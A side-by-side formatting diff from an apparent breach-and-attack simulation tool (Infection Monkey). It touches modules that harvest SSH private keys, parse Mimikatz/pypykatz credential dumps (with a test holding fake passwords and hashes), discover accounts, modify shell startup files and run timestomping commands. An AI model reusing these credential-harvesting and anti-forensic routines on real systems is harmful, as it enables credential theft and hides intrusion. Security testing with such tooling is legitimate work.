"no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff "no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
} }
def get_host_fingerprint(self, host): def get_host_fingerprint(self, host):

View File

@ -169,7 +169,7 @@ class SMBFinger(HostFinger):
os_version, service_client = tuple( os_version, service_client = tuple(
[ [
e.replace(b"\x00", b"").decode() e.replace(b"\x00", b"").decode()
for e in data[47 + length:].split(b"\x00\x00\x00")[:2] for e in data[47 + length :].split(b"\x00\x00\x00")[:2]
] ]
) )

View File

@ -5,35 +5,35 @@ from infection_monkey.network.postgresql_finger import PostgreSQLFinger
IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string." IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string."
_RELEVANT_EXCEPTION_STRING_PARTS = { _RELEVANT_EXCEPTION_STRING_PARTS = {
"pwd_auth_failed":'FATAL: password authentication failed for user "root"', "pwd_auth_failed": 'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",' "ssl_on_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL on', 'user "random", database "postgres", SSL on',
"ssl_off_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",' "ssl_off_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL off', 'user "random", database "postgres", SSL off',
} }
_RELEVANT_EXCEPTION_STRINGS = { _RELEVANT_EXCEPTION_STRINGS = {
"pwd_auth_failed":_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], "pwd_auth_failed": _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found":_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"], "ssl_off_entry_not_found": _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed":"\n".join( "pwd_auth_failed_pwd_auth_failed": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
] ]
), ),
"pwd_auth_failed_ssl_off_entry_not_found":"\n".join( "pwd_auth_failed_ssl_off_entry_not_found": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
] ]
), ),
"ssl_on_entry_not_found_pwd_auth_failed":"\n".join( "ssl_on_entry_not_found_pwd_auth_failed": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"], _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
] ]
), ),
"ssl_on_entry_not_found_ssl_off_entry_not_found":"\n".join( "ssl_on_entry_not_found_ssl_off_entry_not_found": "\n".join(
[ [
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"], _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
@ -42,48 +42,48 @@ _RELEVANT_EXCEPTION_STRINGS = {
} }
_RESULT_STRINGS = { _RESULT_STRINGS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n", "ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n", "ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n", "all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n", "all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR " "selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n", "non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR " "selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n", "SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n", "only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
} }
RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = { RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = {
# SSL not configured, all non-SSL allowed # SSL not configured, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]:[ _RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_not_conf"], _RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["all_non_ssl"], _RESULT_STRINGS["all_non_ssl"],
], ],
# SSL not configured, selected non-SSL allowed # SSL not configured, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]:[ _RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_not_conf"], _RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["selected_non_ssl"], _RESULT_STRINGS["selected_non_ssl"],
], ],
# all SSL allowed, all non-SSL allowed # all SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]:[ _RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"], _RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["all_non_ssl"], _RESULT_STRINGS["all_non_ssl"],
], ],
# all SSL allowed, selected non-SSL allowed # all SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]:[ _RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"], _RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["selected_non_ssl"], _RESULT_STRINGS["selected_non_ssl"],
], ],
# selected SSL allowed, all non-SSL allowed # selected SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]:[ _RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["selected_ssl"], _RESULT_STRINGS["selected_ssl"],
_RESULT_STRINGS["all_non_ssl"], _RESULT_STRINGS["all_non_ssl"],
], ],
# selected SSL allowed, selected non-SSL allowed # selected SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]:[ _RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"], _RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["only_selected"], _RESULT_STRINGS["only_selected"],
], ],

View File

@ -81,8 +81,7 @@ class CommunicateAsNewUser(PBA):
""" """
if exit_status == 0: if exit_status == 0:
PostBreachTelem( PostBreachTelem(
self, self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send() ).send()
else: else:
PostBreachTelem( PostBreachTelem(

View File

@ -9,6 +9,5 @@ class AccountDiscovery(PBA):
def __init__(self): def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts() linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__( super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
windows_cmd=windows_cmds
) )

View File

@ -62,8 +62,7 @@ class PBA(Plugin):
result = exec_funct() result = exec_funct()
if self.scripts_were_used_successfully(result): if self.scripts_were_used_successfully(result):
T1064Telem( T1064Telem(
ScanStatus.USED, ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
f"Scripts were used to execute {self.name} post breach action."
).send() ).send()
PostBreachTelem(self, result).send() PostBreachTelem(self, result).send()
else: else:

View File

@ -1,9 +1,7 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\ from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
import (
get_linux_commands_to_modify_shell_startup_files, get_linux_commands_to_modify_shell_startup_files,
) )
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\ from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
import (
get_windows_commands_to_modify_shell_startup_files, get_windows_commands_to_modify_shell_startup_files,
) )

View File

@ -19,8 +19,7 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [ STARTUP_FILES_PER_USER = [
"\\".join( "\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [ SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
) )
for user in USERS for user in USERS
] ]

View File

@ -13,7 +13,7 @@ CUSTOM_WINDOWS_FILENAME = "filename-for-windows"
def fake_monkey_dir_path(monkeypatch): def fake_monkey_dir_path(monkeypatch):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path", "infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path",
lambda:MONKEY_DIR_PATH, lambda: MONKEY_DIR_PATH,
) )
@ -21,7 +21,7 @@ def fake_monkey_dir_path(monkeypatch):
def set_os_linux(monkeypatch): def set_os_linux(monkeypatch):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os", "infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:False, lambda: False,
) )
@ -29,7 +29,7 @@ def set_os_linux(monkeypatch):
def set_os_windows(monkeypatch): def set_os_windows(monkeypatch):
monkeypatch.setattr( monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os", "infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:True, lambda: True,
) )

View File

@ -10,5 +10,6 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f" f"rm {TEMP_FILE} -f"
] ]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006 # Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md # /T1070.006.md

View File

@ -4,5 +4,6 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands(): def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1" return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006 # Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md # /T1070.006.md

View File

@ -38,11 +38,11 @@ class SSHCollector(object):
possibly hashed) possibly hashed)
""" """
return { return {
"name":name, "name": name,
"home_dir":home_dir, "home_dir": home_dir,
"public_key":None, "public_key": None,
"private_key":None, "private_key": None,
"known_hosts":None, "known_hosts": None,
} }
@staticmethod @staticmethod
@ -84,8 +84,7 @@ class SSHCollector(object):
info["private_key"] = private_key info["private_key"] = private_key
LOG.info("Found private key in %s" % private) LOG.info("Found private key in %s" % private)
T1005Telem( T1005Telem(
ScanStatus.USED, "SSH key", ScanStatus.USED, "SSH key", "Path: %s" % private
"Path: %s" % private
).send() ).send()
else: else:
continue continue

View File

@ -80,8 +80,8 @@ class InfoCollector(object):
""" """
LOG.debug("Reading subnets") LOG.debug("Reading subnets")
self.info["network_info"] = { self.info["network_info"] = {
"networks":get_host_subnets(), "networks": get_host_subnets(),
"netstat":NetstatCollector.get_netstat_info(), "netstat": NetstatCollector.get_netstat_info(),
} }
def get_azure_info(self): def get_azure_info(self):

View File

@ -31,7 +31,7 @@ class AwsCollector(SystemInfoCollector):
info = {} info = {}
if aws.is_instance(): if aws.is_instance():
logger.info("Machine is an AWS instance") logger.info("Machine is an AWS instance")
info = {"instance_id":aws.get_instance_id()} info = {"instance_id": aws.get_instance_id()}
else: else:
logger.info("Machine is NOT an AWS instance") logger.info("Machine is NOT an AWS instance")

View File

@ -21,4 +21,4 @@ class EnvironmentCollector(SystemInfoCollector):
super().__init__(name=ENVIRONMENT_COLLECTOR) super().__init__(name=ENVIRONMENT_COLLECTOR)
def collect(self) -> dict: def collect(self) -> dict:
return {"environment":get_monkey_environment()} return {"environment": get_monkey_environment()}

View File

@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR) super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict: def collect(self) -> dict:
return {"hostname":socket.getfqdn()} return {"hostname": socket.getfqdn()}

View File

@ -30,23 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter(): for process in psutil.process_iter():
try: try:
processes[process.pid] = { processes[process.pid] = {
"name":process.name(), "name": process.name(),
"pid":process.pid, "pid": process.pid,
"ppid":process.ppid(), "ppid": process.ppid(),
"cmdline":" ".join(process.cmdline()), "cmdline": " ".join(process.cmdline()),
"full_image_path":process.exe(), "full_image_path": process.exe(),
} }
except (psutil.AccessDenied, WindowsError): except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in # we may be running as non root and some processes are impossible to acquire in
# Windows/Linux. # Windows/Linux.
# In this case we'll just add what we know. # In this case we'll just add what we know.
processes[process.pid] = { processes[process.pid] = {
"name":"null", "name": "null",
"pid":process.pid, "pid": process.pid,
"ppid":process.ppid(), "ppid": process.ppid(),
"cmdline":"ACCESS DENIED", "cmdline": "ACCESS DENIED",
"full_image_path":"null", "full_image_path": "null",
} }
continue continue
return {"process_list":processes} return {"process_list": processes}

View File

@ -20,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object()) AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = { proto_map = {
(AF_INET, SOCK_STREAM):"tcp", (AF_INET, SOCK_STREAM): "tcp",
(AF_INET6, SOCK_STREAM):"tcp6", (AF_INET6, SOCK_STREAM): "tcp6",
(AF_INET, SOCK_DGRAM):"udp", (AF_INET, SOCK_DGRAM): "udp",
(AF_INET6, SOCK_DGRAM):"udp6", (AF_INET6, SOCK_DGRAM): "udp6",
} }
@staticmethod @staticmethod
@ -34,11 +34,11 @@ class NetstatCollector(object):
@staticmethod @staticmethod
def _parse_connection(c): def _parse_connection(c):
return { return {
"proto":NetstatCollector.proto_map[(c.family, c.type)], "proto": NetstatCollector.proto_map[(c.family, c.type)],
"local_address":c.laddr[0], "local_address": c.laddr[0],
"local_port":c.laddr[1], "local_port": c.laddr[1],
"remote_address":c.raddr[0] if c.raddr else None, "remote_address": c.raddr[0] if c.raddr else None,
"remote_port":c.raddr[1] if c.raddr else None, "remote_port": c.raddr[1] if c.raddr else None,
"status":c.status, "status": c.status,
"pid":c.pid, "pid": c.pid,
} }

View File

@ -28,7 +28,7 @@ class SystemInfoCollectorsHandler(object):
"collected successfully.".format(len(self.collectors_list), successful_collections) "collected successfully.".format(len(self.collectors_list), successful_collections)
) )
SystemInfoTelem({"collectors":system_info_telemetry}).send() SystemInfoTelem({"collectors": system_info_telemetry}).send()
@staticmethod @staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]: def config_to_collectors_list() -> Sequence[SystemInfoCollector]:

View File

@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo. # Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list. # Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "") key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key:cred.to_dict()}) cred_dict.update({key: cred.to_dict()})
return cred_dict return cred_dict

View File

@ -8,123 +8,119 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase): class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same # Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = { PYPYKATZ_SESSION = {
"authentication_id":555555, "authentication_id": 555555,
"session_id":3, "session_id": 3,
"username":"Monkey", "username": "Monkey",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"logon_server":"ReAlDoMaIn", "logon_server": "ReAlDoMaIn",
"logon_time":"2020-06-02T04:53:45.256562+00:00", "logon_time": "2020-06-02T04:53:45.256562+00:00",
"sid":"S-1-6-25-260123139-3611579848-5589493929-3021", "sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
"luid":123086, "luid": 123086,
"msv_creds":[ "msv_creds": [
{ {
"username":"monkey", "username": "monkey",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"NThash":b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9", "NThash": b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash":None, "LMHash": None,
"SHAHash":b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`", "SHAHash": b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
} }
], ],
"wdigest_creds":[ "wdigest_creds": [
{ {
"credtype":"wdigest", "credtype": "wdigest",
"username":"monkey", "username": "monkey",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"password":"canyoufindme", "password": "canyoufindme",
"luid":123086, "luid": 123086,
} }
], ],
"ssp_creds":[ "ssp_creds": [
{ {
"credtype":"wdigest", "credtype": "wdigest",
"username":"monkey123", "username": "monkey123",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"password":"canyoufindme123", "password": "canyoufindme123",
"luid":123086, "luid": 123086,
} }
], ],
"livessp_creds":[ "livessp_creds": [
{ {
"credtype":"wdigest", "credtype": "wdigest",
"username":"monk3y", "username": "monk3y",
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"password":"canyoufindm3", "password": "canyoufindm3",
"luid":123086, "luid": 123086,
} }
], ],
"dpapi_creds":[ "dpapi_creds": [
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"dpapi", "credtype": "dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f", "key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9", "f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da", "sha1_masterkey": "bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086, "luid": 123086,
}, },
{"credtype":"dpapi", "key_guid":"9123-123ae123de4-121239-3123-421f"}, {"credtype": "dpapi", "key_guid": "9123-123ae123de4-121239-3123-421f"},
], ],
"kerberos_creds":[ "kerberos_creds": [
{ {
"credtype":"kerberos", "credtype": "kerberos",
"username":"monkey_kerb", "username": "monkey_kerb",
"password":None, "password": None,
"domainname":"ReAlDoMaIn", "domainname": "ReAlDoMaIn",
"luid":123086, "luid": 123086,
"tickets":[], "tickets": [],
} }
], ],
"credman_creds":[ "credman_creds": [
{ {
"credtype":"credman", "credtype": "credman",
"username":"monkey", "username": "monkey",
"domainname":"monkey.ad.monkey.com", "domainname": "monkey.ad.monkey.com",
"password":"canyoufindme2", "password": "canyoufindme2",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"credman", "credtype": "credman",
"username":"monkey@monkey.com", "username": "monkey@monkey.com",
"domainname":"moneky.monkey.com", "domainname": "moneky.monkey.com",
"password":"canyoufindme1", "password": "canyoufindme1",
"luid":123086, "luid": 123086,
}, },
{ {
"credtype":"credman", "credtype": "credman",
"username":"test", "username": "test",
"domainname":"test.test.ts", "domainname": "test.test.ts",
"password":"canyoufindit", "password": "canyoufindit",
"luid":123086, "luid": 123086,
}, },
], ],
"tspkg_creds":[], "tspkg_creds": [],
} }
def test__get_creds_from_pypykatz_session(self): def test__get_creds_from_pypykatz_session(self):
@ -132,27 +128,27 @@ class TestPypykatzHandler(TestCase):
test_dicts = [ test_dicts = [
{ {
"username":"monkey", "username": "monkey",
"ntlm_hash":"31b73c59d7e0c089c031d6cfe0d16ae9", "ntlm_hash": "31b73c59d7e0c089c031d6cfe0d16ae9",
"password":"", "password": "",
"lm_hash":"", "lm_hash": "",
}, },
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme", "lm_hash":""}, {"username": "monkey", "ntlm_hash": "", "password": "canyoufindme", "lm_hash": ""},
{ {
"username":"monkey123", "username": "monkey123",
"ntlm_hash":"", "ntlm_hash": "",
"password":"canyoufindme123", "password": "canyoufindme123",
"lm_hash":"", "lm_hash": "",
}, },
{"username":"monk3y", "ntlm_hash":"", "password":"canyoufindm3", "lm_hash":""}, {"username": "monk3y", "ntlm_hash": "", "password": "canyoufindm3", "lm_hash": ""},
{"username":"monkey", "ntlm_hash":"", "password":"canyoufindme2", "lm_hash":""}, {"username": "monkey", "ntlm_hash": "", "password": "canyoufindme2", "lm_hash": ""},
{ {
"username":"monkey@monkey.com", "username": "monkey@monkey.com",
"ntlm_hash":"", "ntlm_hash": "",
"password":"canyoufindme1", "password": "canyoufindme1",
"lm_hash":"", "lm_hash": "",
}, },
{"username":"test", "ntlm_hash":"", "password":"canyoufindit", "lm_hash":""}, {"username": "test", "ntlm_hash": "", "password": "canyoufindit", "lm_hash": ""},
] ]
results = [result.to_dict() for result in results] results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts] [self.assertTrue(test_dict in results) for test_dict in test_dicts]

View File

@ -10,8 +10,8 @@ class WindowsCredentials:
def to_dict(self) -> Dict: def to_dict(self) -> Dict:
return { return {
"username":self.username, "username": self.username,
"password":self.password, "password": self.password,
"ntlm_hash":self.ntlm_hash, "ntlm_hash": self.ntlm_hash,
"lm_hash":self.lm_hash, "lm_hash": self.lm_hash,
} }

View File

@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!! # monkey should run as *** SYSTEM *** !!!
# #
WMI_LDAP_CLASSES = { WMI_LDAP_CLASSES = {
"ds_user":( "ds_user": (
"DS_sAMAccountName", "DS_sAMAccountName",
"DS_userPrincipalName", "DS_userPrincipalName",
"DS_sAMAccountType", "DS_sAMAccountType",
@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount", "DS_logonCount",
"DS_accountExpires", "DS_accountExpires",
), ),
"ds_group":( "ds_group": (
"DS_whenChanged", "DS_whenChanged",
"DS_whenCreated", "DS_whenCreated",
"DS_sAMAccountName", "DS_sAMAccountName",
@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName", "DS_distinguishedName",
"ADSIPath", "ADSIPath",
), ),
"ds_computer":( "ds_computer": (
"DS_dNSHostName", "DS_dNSHostName",
"ADSIPath", "ADSIPath",
"DS_accountExpires", "DS_accountExpires",

View File

@ -44,8 +44,7 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle: if not handle:
LOG.error( LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, "Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
last_error
) )
return False return False
if winerror.ERROR_ALREADY_EXISTS == last_error: if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK telem_category = TelemCategoryEnum.ATTACK
def get_data(self): def get_data(self):
return {"status":self.status.value, "technique":self.technique} return {"status": self.status.value, "technique": self.technique}

View File

@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1005Telem, self).get_data() data = super(T1005Telem, self).get_data()
data.update({"gathered_data_type":self.gathered_data_type, "info":self.info}) data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
return data return data

View File

@ -15,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1064Telem, self).get_data() data = super(T1064Telem, self).get_data()
data.update({"usage":self.usage}) data.update({"usage": self.usage})
return data return data

View File

@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1105Telem, self).get_data() data = super(T1105Telem, self).get_data()
data.update({"filename":self.filename, "src":self.src, "dst":self.dst}) data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
return data return data

View File

@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self): def get_data(self):
data = super(T1107Telem, self).get_data() data = super(T1107Telem, self).get_data()
data.update({"path":self.path}) data.update({"path": self.path})
return data return data

View File

@ -18,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self): def get_data(self):
data = super(T1197Telem, self).get_data() data = super(T1197Telem, self).get_data()
data.update({"usage":self.usage}) data.update({"usage": self.usage})
return data return data

View File

@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self): def get_data(self):
data = super(T1222Telem, self).get_data() data = super(T1222Telem, self).get_data()
data.update({"command":self.command}) data.update({"command": self.command})
return data return data

View File

@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self): def get_data(self):
data = super(UsageTelem, self).get_data() data = super(UsageTelem, self).get_data()
data.update({"usage":self.usage}) data.update({"usage": self.usage})
return data return data

View File

@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py :param machine: VictimHost obj from model/host.py
""" """
super(VictimHostTelem, self).__init__(technique, status) super(VictimHostTelem, self).__init__(technique, status)
self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr} self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
def get_data(self): def get_data(self):
